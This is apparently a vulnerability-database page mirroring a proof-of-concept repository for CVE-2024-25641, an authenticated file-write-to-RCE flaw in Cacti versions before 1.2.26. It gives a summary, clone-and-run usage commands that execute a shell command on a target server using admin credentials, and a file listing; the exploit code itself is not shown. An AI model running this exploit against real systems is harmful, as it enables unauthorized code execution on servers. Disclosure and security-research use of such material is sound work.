CVE-2024-25641 PoC — Cacti 安全漏洞

Source

Associated Vulnerability

Description

Fully automated PoC - CVE-2024-25641 - RCE - Cacti < v1.2.26 🌵

Readme

# CVE-2024-25641 - Cacti 1.2.26 - Arbitrary file write to RCE 🌵

- [x] `Authenticated RCE`
- [x] `Cacti version < v1.2.26`

## Summary
___

An arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server (RCE).


## Proof Of Concept
___

![CVE DEMO](https://github.com/user-attachments/assets/1ee4800b-4fc1-4bf4-8b7a-a4e5999143e9)

## Usage
___

```
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

pip install -r requirements.txt

python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
```

### With poetry
```
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

poetry install

poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
```

File Snapshot

 [4.0K]  /data/pocs/116f746f920771769811f0fed744ce7551105dfe
├── [4.0K]  core
│   ├── [   0]  __init__.py
│   └── [2.7K]  Output.py
├── [8.6K]  CVE-2024-25641.py
├── [ 38K]  poetry.lock
├── [ 412]  pyproject.toml
├── [1018]  README.md
└── [ 111]  requirements.txt

1 directory, 7 files

Remarks